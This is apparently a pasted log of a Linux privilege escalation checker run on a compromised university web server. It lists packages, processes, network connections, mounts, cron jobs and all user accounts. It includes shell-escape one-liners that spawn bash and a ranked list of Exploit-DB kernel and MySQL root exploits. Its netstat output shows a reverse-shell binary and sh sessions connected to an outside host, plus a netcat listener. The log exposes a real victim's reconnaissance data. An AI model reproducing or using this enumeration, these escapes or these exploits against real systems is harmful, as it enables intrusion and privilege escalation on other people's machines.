  3574. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  3575. python-configobj-4.7.2-7.el7.noarch
  3576. python-decorator-3.4.0-3.el7.noarch
  3577. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  3578. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  3579. python-iniparse-0.4-9.el7.noarch
  3580. python-libs-2.7.5-48.el7.x86_64
  3581. python-perf-3.10.0-514.26.2.el7.x86_64
  3582. python-pycurl-7.19.0-19.el7.x86_64
  3583. python-pyudev-0.15-7.el7_2.1.noarch
  3584. python-setuptools-0.9.8-4.el7.noarch
  3585. python-slip-0.4.0-2.el7.noarch
  3586. python-slip-dbus-0.4.0-2.el7.noarch
  3587. python-urlgrabber-3.10-8.el7.noarch
  3588. rpm-python-4.11.3-21.el7.x86_64
  3589. root 22 Apr01 3:06 [migration/3]
  3590. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  3591. root 15688 22:10 0:00 [kworker/u8:1]
  3592. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  3593. root 292 Apr01 0:00 [scsi_tmf_0]
  3594. root 429 Apr01 0:00 [xfs-eofblocks/d]
  3595. root 603 Apr01 0:00 [xfs-buf/sda1]
  3596. root 29 Apr01 0:11 [khungtaskd]
  3597. root 23 Apr01 6:25 [ksoftirqd/3]
  3598. root 15247 22:05 0:00 [kworker/0:1]
  3599. root 616 Apr01 6:57 [jbd2/sdb1-8]
  3600. root 9931 21:20 0:01 [kworker/3:0]
  3601. root 604 Apr01 0:00 [xfs-data/sda1]
  3602. root 44 Apr01 0:00 [ksmd]
  3603. root 3170 19:50 0:00 [kworker/1:0]
  3604. root 430 Apr01 85:39 [xfsaild/dm-1]
  3605. root 79 Apr01 0:00 [deferwq]
  3606. root 2 Apr01 0:11 [kthreadd]
  3607. root 14519 21:55 0:00 [kworker/2:0]
  3608. root 27667 Oct27 0:00 /usr/sbin/sshd
  3609. root 27 Apr01 0:00 [kdevtmpfs]
  3610. root 1284 Apr01 0:00 /usr/sbin/dovecot
  3611. Possible Related Packages:
  3612. dovecot-2.2.10-7.el7.x86_64
  3613. root 45 Apr01 39:05 [khugepaged]
  3614. root 670 Apr01 0:00 /usr/sbin/saslauthd
  3615. root 32 Apr01 0:00 [bioset]
  3616. root 395 Apr01 0:00 [kdmflush]
  3617. root 16310 22:15 0:00 [kworker/1:1]
  3618. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  3619. Possible Related Packages:
  3620. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  3621. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  3622. systemd-219-30.el7_3.9.x86_64
  3623. systemd-libs-219-30.el7_3.9.x86_64
  3624. systemd-sysv-219-30.el7_3.9.x86_64
  3625. root 8264 21:00 0:00 /usr/sbin/CROND
  3626. root 17 Apr01 2:17 [migration/2]
  3627. root 16559 22:20 0:00 [kworker/3:2]
  3628. root 16173 22:15 0:00 [kworker/2:2]
  3629. root 43 Apr01 118:29 [kswapd0]
  3630. root 30 Apr01 0:00 [writeback]
  3631. root 633 Apr01 8:48 /sbin/auditd
  3632. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  3633. root 18 Apr01 2:20 [ksoftirqd/2]
  3634. root 424 Apr01 0:00 [xfs-data/dm-1]
  3635. root 11254 21:36 0:00 [kworker/0:1H]
  3636. root 58 Apr01 0:00 [kpsmoused]
  3637. root 669 Apr01 0:00 /usr/sbin/saslauthd
  3638. root 8271 21:00 0:00 sleep
  3639. root 668 Apr01 0:00 /usr/sbin/saslauthd
  3640. root 425 Apr01 0:00 [xfs-conv/dm-1]
  3641. root 9004 14:52 0:00 [kworker/0:0H]
  3642. root 308 Apr01 0:00 [scsi_eh_2]
  3643. root 16951 Jul10 3:46 /usr/bin/perl
  3644. Possible Related Packages:
  3645. mod_perl-2.0.10-2.el7.x86_64
  3646. perl-5.16.3-291.el7.x86_64
  3647. perl-Archive-Tar-1.92-2.el7.noarch
  3648. perl-BSD-Resource-1.29.07-1.el7.x86_64
  3649. perl-Business-ISBN-2.06-2.el7.noarch
  3650. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  3651. perl-CGI-3.63-4.el7.noarch
  3652. perl-Carp-1.26-244.el7.noarch
  3653. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  3654. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  3655. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  3656. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  3657. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  3658. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  3659. perl-DBD-MySQL-4.023-5.el7.x86_64
  3660. perl-DBD-Pg-2.19.3-4.el7.x86_64
  3661. perl-DBI-1.627-4.el7.x86_64
  3662. perl-DB_File-1.830-6.el7.x86_64
  3663. perl-Data-Dumper-2.145-3.el7.x86_64
  3664. perl-Digest-1.17-245.el7.noarch
  3665. perl-Digest-HMAC-1.03-5.el7.noarch
  3666. perl-Digest-MD5-2.52-3.el7.x86_64
  3667. perl-Digest-SHA-5.85-3.el7.x86_64
  3668. perl-Encode-2.51-7.el7.x86_64
  3669. perl-Encode-Detect-1.01-13.el7.x86_64
  3670. perl-Encode-Locale-1.03-5.el7.noarch
  3671. perl-Error-0.17020-2.el7.noarch
  3672. perl-Exporter-5.68-3.el7.noarch
  3673. perl-ExtUtils-Install-1.58-291.el7.noarch
  3674. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  3675. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  3676. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  3677. perl-FCGI-0.74-8.el7.x86_64
  3678. perl-File-Listing-6.04-7.el7.noarch
  3679. perl-File-Path-2.09-2.el7.noarch
  3680. perl-File-Temp-0.23.01-3.el7.noarch
  3681. perl-Filter-1.49-3.el7.x86_64
  3682. perl-Geo-IP-1.43-3.el7.x86_64
  3683. perl-Getopt-Long-2.40-2.el7.noarch
  3684. perl-HTML-Parser-3.71-4.el7.x86_64
  3685. perl-HTML-Tagset-3.20-15.el7.noarch
  3686. perl-HTTP-Cookies-6.01-5.el7.noarch
  3687. perl-HTTP-Daemon-6.01-5.el7.noarch
  3688. perl-HTTP-Date-6.02-8.el7.noarch
  3689. perl-HTTP-Message-6.06-6.el7.noarch
  3690. perl-HTTP-Negotiate-6.01-5.el7.noarch
  3691. perl-HTTP-Tiny-0.033-3.el7.noarch
  3692. perl-IO-Compress-2.061-2.el7.noarch
  3693. perl-IO-HTML-1.00-2.el7.noarch
  3694. perl-IO-Socket-INET6-2.69-5.el7.noarch
  3695. perl-IO-Socket-IP-0.21-4.el7.noarch
  3696. perl-IO-Socket-SSL-1.94-5.el7.noarch
  3697. perl-IO-Tty-1.10-11.el7.x86_64
  3698. perl-IO-Zlib-1.10-291.el7.noarch
  3699. perl-LWP-MediaTypes-6.02-2.el7.noarch
  3700. perl-Linux-Pid-0.04-18.el7.x86_64
  3701. perl-Mail-DKIM-0.39-8.el7.noarch
  3702. perl-Mail-SPF-2.8.0-4.el7.noarch
  3703. perl-MailTools-2.12-2.el7.noarch
  3704. perl-Net-DNS-0.72-6.el7.x86_64
  3705. perl-Net-Daemon-0.48-5.el7.noarch
  3706. perl-Net-HTTP-6.06-2.el7.noarch
  3707. perl-Net-IP-1.26-4.el7.noarch
  3708. perl-Net-LibIDN-0.12-15.el7.x86_64
  3709. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  3710. perl-Net-SSLeay-1.55-4.el7.x86_64
  3711. perl-NetAddr-IP-4.069-3.el7.x86_64
  3712. perl-Package-Constants-0.02-291.el7.noarch
  3713. perl-PathTools-3.40-5.el7.x86_64
  3714. perl-PlRPC-0.2020-14.el7.noarch
  3715. perl-Pod-Escapes-1.04-291.el7.noarch
  3716. perl-Pod-Perldoc-3.20-4.el7.noarch
  3717. perl-Pod-Simple-3.28-4.el7.noarch
  3718. perl-Pod-Usage-1.63-3.el7.noarch
  3719. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  3720. perl-Socket-2.010-4.el7.x86_64
  3721. perl-Socket6-0.23-15.el7.x86_64
  3722. perl-Storable-2.45-3.el7.x86_64
  3723. perl-Switch-2.16-7.el7.noarch
  3724. perl-Sys-Syslog-0.33-3.el7.x86_64
  3725. perl-Test-Harness-3.28-3.el7.noarch
  3726. perl-Text-ParseWords-3.29-4.el7.noarch
  3727. perl-Time-HiRes-1.9725-3.el7.x86_64
  3728. perl-Time-Local-1.2300-2.el7.noarch
  3729. perl-TimeDate-2.30-2.el7.noarch
  3730. perl-URI-1.60-9.el7.noarch
  3731. perl-WWW-RobotRules-6.02-5.el7.noarch
  3732. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  3733. perl-XML-Parser-2.41-10.el7.x86_64
  3734. perl-XML-SAX-0.99-9.el7.noarch
  3735. perl-XML-SAX-Base-1.08-7.el7.noarch
  3736. perl-XML-Simple-2.20-5.el7.noarch
  3737. perl-constant-1.27-2.el7.noarch
  3738. perl-devel-5.16.3-291.el7.x86_64
  3739. perl-libs-5.16.3-291.el7.x86_64
  3740. perl-libwww-perl-6.05-2.el7.noarch
  3741. perl-macros-5.16.3-291.el7.x86_64
  3742. perl-parent-0.225-244.el7.noarch
  3743. perl-podlators-2.5.1-3.el7.noarch
  3744. perl-threads-1.87-4.el7.x86_64
  3745. perl-threads-shared-1.43-6.el7.x86_64
  3746. perl-version-0.99.07-2.el7.x86_64
  3747. root 426 Apr01 0:00 [xfs-cil/dm-1]
  3748. root 610 Apr01 0:00 [xfsaild/sda1]
  3749. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  3750. root 113 Apr01 2:24 [kauditd]
  3751. root 31 Apr01 0:00 [kintegrityd]
  3752. root 16709 22:20 0:00 [kworker/1:2]
  3753. root 57 Apr01 0:00 [kmpath_rdacd]
  3754. root 47 Apr01 0:00 [crypto]
  3755. root 10 Apr01 2:25 [watchdog/0]
  3756. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  3757. root 404 Apr01 0:00 [bioset]
  3758. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  3759. root 46 Apr01 0:00 [fsnotify_mark]
  3760. root 605 Apr01 0:00 [xfs-conv/sda1]
  3761. root 9071 21:08 0:00 [kworker/u8:0]
  3762. root 297 Apr01 0:00 [mpt_poll_0]
  3763. root 608 Apr01 0:00 [xfs-log/sda1]
  3764. root 13 Apr01 10:43 [ksoftirqd/1]
  3765. root 20 Apr01 0:00 [kworker/2:0H]
  3766. root 298 Apr01 0:00 [mpt/0]
  3767. root 13725 Jul10 3:14 /usr/sbin/crond
  3768. root 422 Apr01 0:00 [xfs_mru_cache]
  3769. root 288 Apr01 0:00 [ata_sff]
  3770. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  3771. root 33 Apr01 0:00 [kblockd]
  3772. root 312 Apr01 0:00 [ttm_swap]
  3773. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  3774. Possible Related Packages:
  3775. irqbalance-1.0.7-6.el7_3.1.x86_64
  3776. root 428 Apr01 0:00 [xfs-log/dm-1]
  3777. root 291 Apr01 0:00 [scsi_eh_0]
  3778. root 9 Apr01 250:48 [rcu_sched]
  3779.  
  3780. [*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
  3781.  
  3782. [+] Installed Tools
  3783. /usr/bin/awk
  3784. /usr/bin/perl
  3785. /usr/bin/python
  3786. /usr/bin/ruby
  3787. /usr/bin/vi
  3788. /usr/bin/find
  3789. /usr/bin/nc
  3790. /usr/bin/wget
  3791.  
  3792. [+] Related Shell Escape Sequences...
  3793.  
  3794. vi--> :!bash
  3795. vi--> :set shell=/bin/bash:shell
  3796. awk--> awk 'BEGIN {system("/bin/bash")}'
  3797. find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
  3798. perl--> perl -e 'exec "/bin/bash";'
  3799.  
  3800. [*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
  3801.  
  3802. Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
  3803.  
  3804. The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
  3805. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  3806.  
  3807. The following exploits are applicable to this kernel version and should be investigated as well
  3808. - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
  3809. - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby
  3810. - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
  3811. - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
  3812. - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
  3813. - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
  3814. - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
  3815.  
  3816. Finished
  3817. ==================================================================================================================================================================================================
  3818. LINUX PRIVILEGE ESCALATION CHECKER
  3819. =================================================================================================
  3820.  
  3821. [*] GETTING BASIC SYSTEM INFO...
  3822.  
  3823. [+] Kernel
  3824. Linux version 3.10.0-514.10.2.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-11) (GCC) ) #1 SMP Fri Mar 3 00:04:05 UTC 2017
  3825.  
  3826. [+] Hostname
  3827. servertest
  3828.  
  3829. [+] Operating System
  3830. \S
  3831. Kernel \r on an \m
  3832.  
  3833. [*] GETTING NETWORKING INFO...
  3834.  
  3835. [+] Interfaces
  3836. ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  3837. inet 150.214.91.122 netmask 255.255.255.0 broadcast 150.214.91.255
  3838. inet6 fe80::250:56ff:fe84:41cb prefixlen 64 scopeid 0x20<link>
  3839. ether 00:50:56:84:41:cb txqueuelen 1000 (Ethernet)
  3840. RX packets 1758525162 bytes 237635980617 (221.3 GiB)
  3841. RX errors 0 dropped 229199 overruns 0 frame 0
  3842. TX packets 8562477403 bytes 22999852696631 (20.9 TiB)
  3843. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  3844. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  3845. inet 127.0.0.1 netmask 255.0.0.0
  3846. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  3847. loop txqueuelen 1 (Local Loopback)
  3848. RX packets 39811102 bytes 18998639641 (17.6 GiB)
  3849. RX errors 0 dropped 0 overruns 0 frame 0
  3850. TX packets 39811102 bytes 18998639641 (17.6 GiB)
  3851. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  3852.  
  3853. [+] Netstat
  3854. Active Internet connections (servers and established)
  3855. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  3856. tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
  3857. tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
  3858. tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
  3859. tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN -
  3860. tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 11713/nc
  3861. tcp 0 0 150.214.91.122:53 0.0.0.0:* LISTEN -
  3862. tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
  3863. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  3864. tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
  3865. tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
  3866. tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
  3867. tcp 0 0 0.0.0.0:20000 0.0.0.0:* LISTEN -
  3868. tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
  3869. tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN -
  3870. tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
  3871. tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
  3872. tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN -
  3873. tcp 961 0 150.214.91.122:40948 92.56.216.153:4445 CLOSE_WAIT 10469/sh
  3874. tcp 0 0 150.214.91.122:40980 92.56.216.153:4446 ESTABLISHED 10881/./reverse.elf
  3875. tcp 241 0 150.214.91.122:41044 92.56.216.153:4445 CLOSE_WAIT 10856/sh
  3876. tcp6 0 0 :::110 :::* LISTEN -
  3877. tcp6 0 0 :::111 :::* LISTEN -
  3878. tcp6 0 0 :::143 :::* LISTEN -
  3879. tcp6 0 0 :::80 :::* LISTEN -
  3880. tcp6 0 0 :::1234 :::* LISTEN 11713/nc
  3881. tcp6 0 0 :::21 :::* LISTEN -
  3882. tcp6 0 0 :::53 :::* LISTEN -
  3883. tcp6 0 0 :::22 :::* LISTEN -
  3884. tcp6 0 0 ::1:5432 :::* LISTEN -
  3885. tcp6 0 0 ::1:953 :::* LISTEN -
  3886. tcp6 0 0 :::25 :::* LISTEN -
  3887. tcp6 0 0 :::443 :::* LISTEN -
  3888. tcp6 0 0 :::993 :::* LISTEN -
  3889. tcp6 0 0 :::995 :::* LISTEN -
  3890. tcp6 0 0 :::587 :::* LISTEN -
  3891. tcp6 0 0 150.214.91.122:80 81.61.224.35:60494 ESTABLISHED -
  3892. tcp6 0 0 150.214.91.122:80 81.61.224.35:60496 ESTABLISHED -
  3893. tcp6 0 0 150.214.91.122:80 81.61.224.35:60497 ESTABLISHED -
  3894. tcp6 0 0 150.214.91.122:80 81.61.224.35:60493 ESTABLISHED -
  3895. tcp6 0 0 150.214.91.122:80 81.61.224.35:60495 ESTABLISHED -
  3896. tcp6 0 0 150.214.91.122:80 81.61.224.35:60498 ESTABLISHED -
  3897. udp 0 0 0.0.0.0:40069 0.0.0.0:* -
  3898. udp 0 0 0.0.0.0:20000 0.0.0.0:* -
  3899. udp 0 0 150.214.91.122:53 0.0.0.0:* -
  3900. udp 0 0 127.0.0.1:53 0.0.0.0:* -
  3901. udp 0 0 0.0.0.0:5353 0.0.0.0:* -
  3902. udp 0 0 0.0.0.0:10000 0.0.0.0:* -
  3903. udp6 0 0 ::1:48145 ::1:48145 ESTABLISHED -
  3904. udp6 0 0 :::53 :::* -
  3905.  
  3906. [+] Route
  3907. Kernel IP routing table
  3908. Destination Gateway Genmask Flags Metric Ref Use Iface
  3909. default gateway 0.0.0.0 UG 100 0 0 ens32
  3910. 150.214.91.0 0.0.0.0 255.255.255.0 U 100 0 0 ens32
  3911.  
  3912. [*] GETTING FILESYSTEM INFO...
  3913.  
  3914. [+] Mount results
  3915. /dev/mapper/centos-root on / type xfs (rw,relatime,attr2,inode64,noquota)
  3916. devtmpfs on /dev type devtmpfs (rw,nosuid,size=3994672k,nr_inodes=998668,mode=755)
  3917. tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
  3918. devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
  3919. hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
  3920. mqueue on /dev/mqueue type mqueue (rw,relatime)
  3921. proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  3922. systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=32,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
  3923. binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
  3924. sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
  3925. securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
  3926. tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
  3927. cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
  3928. cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
  3929. cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
  3930. cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls)
  3931. cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
  3932. cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
  3933. cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
  3934. cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
  3935. cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
  3936. cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
  3937. cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
  3938. pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
  3939. configfs on /sys/kernel/config type configfs (rw,relatime)
  3940. debugfs on /sys/kernel/debug type debugfs (rw,relatime)
  3941. tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
  3942. tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=801084k,mode=700)
  3943. /dev/sdb1 on /home type ext4 (rw,relatime,quota,usrquota,grpquota,data=ordered)
  3944. /dev/sda1 on /boot type xfs (rw,relatime,attr2,inode64,noquota)
  3945. /dev/mapper/centos-root on /tmp type xfs (rw,relatime,attr2,inode64,noquota)
  3946. /dev/mapper/centos-root on /var/tmp type xfs (rw,relatime,attr2,inode64,noquota)
  3947.  
  3948. [+] fstab entries
  3949. #
  3950. # /etc/fstab
  3951. # Created by anaconda on Thu Mar 5 09:25:05 2015
  3952. #
  3953. # Accessible filesystems, by reference, are maintained under '/dev/disk'
  3954. # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
  3955. #
  3956. /dev/mapper/centos-root / xfs seclabel,inode64,relatime,attr2,grpquota,usrquota,rw 0 1
  3957. UUID=d6fe1c31-2352-43a4-ae6a-27db05987d1f /boot xfs defaults 1 2
  3958. /dev/mapper/centos-swap swap swap defaults 0 0
  3959. LABEL=/home /home ext4 usrquota,grpquota 0 2
  3960.  
  3961. [+] Scheduled cron jobs
  3962. -rw------- 1 root root 0 Mar 31 2016 /etc/cron.deny
  3963. -rw-r--r--. 1 root root 451 Jun 10 2014 /etc/crontab
  3964. /etc/cron.d:
  3965. total 28
  3966. drwxr-xr-x. 2 root root 70 Apr 1 2017 .
  3967. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  3968. -rw-r--r-- 1 root root 128 Mar 31 2016 0hourly
  3969. -rw------- 1 root root 203 Mar 30 2016 clamav-update
  3970. -rw-r--r-- 1 root root 2481 Apr 1 2017 mailman
  3971. -rw-r--r-- 1 root root 459 Jun 24 2015 sa-update
  3972. /etc/cron.daily:
  3973. total 28
  3974. drwxr-xr-x. 2 root root 72 Feb 27 2017 .
  3975. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  3976. -rwxr-xr-x 1 root root 211 Jan 12 2017 00webalizer
  3977. -rwx------ 1 root root 219 Nov 5 2016 logrotate
  3978. -rwxr-xr-x. 1 root root 618 Mar 17 2014 man-db.cron
  3979. -rwx------ 1 root root 208 Nov 4 2016 mlocate
  3980. /etc/cron.hourly:
  3981. total 20
  3982. drwxr-xr-x. 2 root root 35 Jan 19 2017 .
  3983. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  3984. -rwxr-xr-x 1 root root 392 Mar 31 2016 0anacron
  3985. -rwxr-x---. 1 root root 174 Mar 5 2015 awstats
  3986. /etc/cron.monthly:
  3987. total 12
  3988. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  3989. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  3990. /etc/cron.weekly:
  3991. total 12
  3992. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  3993. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  3994.  
  3995. [+] Writable cron dirs
  3996.  
  3997.  
  3998. [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
  3999.  
  4000. [+] Logged in User Activity
  4001. 22:24:03 up 233 days, 21:59, 0 users, load average: 0.04, 0.21, 0.30
  4002. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  4003.  
  4004. [+] Super Users Found:
  4005. root
  4006.  
  4007. [+] Environment
  4008. USER=programacion
  4009. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
  4010. _=/usr/bin/env
  4011. PWD=/tmp
  4012. LANG=C
  4013. SHLVL=3
  4014. HOME=/home/servertest
  4015.  
  4016. [+] Root and current user history (depends on privs)
  4017. -rw------- 1 programacion programacion 1533 Nov 20 21:45 /home/servertest/.bash_history
  4018.  
  4019. [+] Sudoers (privileged)
  4020.  
  4021. [+] All users
  4022. root:x:0:0:root:/root:/bin/bash
  4023. bin:x:1:1:bin:/bin:/sbin/nologin
  4024. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  4025. adm:x:3:4:adm:/var/adm:/sbin/nologin
  4026. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  4027. sync:x:5:0:sync:/sbin:/bin/sync
  4028. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  4029. halt:x:7:0:halt:/sbin:/sbin/halt
  4030. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  4031. operator:x:11:0:operator:/root:/sbin/nologin
  4032. games:x:12:100:games:/usr/games:/sbin/nologin
  4033. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  4034. nobody:x:99:99:Nobody:/:/sbin/nologin
  4035. dbus:x:81:81:System message bus:/:/sbin/nologin
  4036. polkitd:x:999:998:User for polkitd:/:/sbin/nologin
  4037. avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
  4038. avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
  4039. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  4040. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  4041. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
  4042. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  4043. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
  4044. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
  4045. dovenull:x:998:997:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
  4046. mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
  4047. postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
  4048. named:x:25:25:Named:/var/named:/sbin/nologin
  4049. saslauth:x:997:76:"Saslauthd user":/run/saslauthd:/sbin/nologin
  4050. clamupdate:x:996:996:Clamav database update user:/var/lib/clamav:/sbin/nologin
  4051. clamscan:x:995:995:Clamav scanner user:/:/sbin/nologin
  4052. tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
  4053. epsalgeciras:x:508:508:Escuela Politecnica Superior de Algeciras:/home/epsalgeciras:/bin/sh
  4054. zabbix:x:506:3:Zabbix agents owner:/opt/zabbix:/bin/bash
  4055. imeymat:x:518:518:Instituto de Microscopía Electrónica y Materiales:/home/imeymat:/bin/sh
  4056. systemd-bus-proxy:x:505:506:systemd Bus Proxy:/:/sbin/nologin
  4057. systemd-network:x:504:505:systemd Network Management:/:/sbin/nologin
  4058. master:x:523:523::/home/master:/bin/sh
  4059. gradosindustriales:x:528:528:Grados Industriales:/home/gradosindustriales:/bin/sh
  4060. ccsociales:x:531:531:Clone of Centro UCA 1:/home/ccsociales:/bin/sh
  4061. ciencias:x:534:533:Web de Ciencias:/home/ciencias:/bin/sh
  4062. mario.ciencias:x:534:533:Mario:/home/ciencias/public_html:/bin/false
  4063. default:x:536:535:El servidor predeterminado:/home/default:/bin/sh
  4064. rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
  4065. iuila:x:539:538::/home/iuila:/bin/sh
  4066. enfyfis:x:541:540:Enfermería y Fisioterapia:/home/enfyfis:/bin/sh
  4067. indess:x:542:541::/home/indess:/bin/sh
  4068. caiv:x:543:542:Centro Andaluz de Investigaciones Vitivinícolas:/home/caiv:/bin/sh
  4069. epsalgeciras1:x:547:546:Clone of Escuela Politecnica Superior de Algeciras:/home/epsalgeciras1:/bin/sh
  4070. economicas:x:550:549:Facultad de Ciencias Económicas y Empresariales:/home/economicas:/bin/sh
  4071. programacion:x:553:552::/home/servertest:/bin/sh
  4072. servertest:x:1000:552::/home/servertest:/bin/bash
  4073. masingind:x:556:554::/home/masingind:/bin/sh
  4074.  
  4075. [+] Current User
  4076. programacion
  4077.  
  4078. [+] Current User ID
  4079. uid=553(programacion) gid=552(programacion) groups=552(programacion)
  4080.  
